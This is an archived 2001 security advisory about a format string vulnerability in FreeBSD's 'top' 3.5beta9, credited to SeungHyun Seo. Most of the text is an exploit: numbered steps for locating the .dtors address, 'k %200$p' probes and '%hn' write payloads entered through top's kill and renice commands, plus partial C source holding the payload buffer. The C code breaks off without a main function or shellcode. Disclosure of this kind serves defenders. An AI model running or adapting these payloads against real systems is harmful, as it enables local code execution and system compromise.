FreeBSD TOP Kill/Renice Format String Vulnerability
23 Jul. 2001
Summary
TOP is a CPU and Process monitoring utility, the FreeBSD version of the program contains a formatting string vulnerability. The vulnerability allows attackers with local access to overflow an internal buffer the program uses, and cause it to execute arbitrary code.
Credit:
The information has been provided by SeungHyun Seo.
Vulnerable systems:
TOP version 3.5beta9 (FreeBSD)
Exploits:
/*
* freebsd x86 top exploit
* affected under top-3.5beta9 ( including this version )
*
* 1. get the address of .dtors from /usr/bin/top using objdump ,
*
* 'objdump -s -j .dtors /usr/bin/top'
*
* 2. divide it into four parts, and set it up into an environment variable like "XSEO="
*
* 3. run top, then find "your parted addresses from "kill" or "renice" command like this
*
* 'k %200$p' or 'r 2000 %200$p'
*
* 4. do exploit !
*
* 'k %190u%230$hn' <== 0xbf (4)
* 'k %190u%229$hn' <== 0xbf (3)
* 'k %214u%228$hn' <== 0xd7 (2)
* 'k %118u%227$hn' <== 0x77 (1)
*
* truefinder , seo@igrus.inha.ac.kr
* thx mat, labman, zen-parse
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 2048
char fmt[]=
"XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
/* .dtors's address in BSD*/
"\x08\xff\x04\x08"
"\x09\xff\x04\x08"
"\x0a\xff\x04\x08"
"\x0b\xff\x04\x08"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */
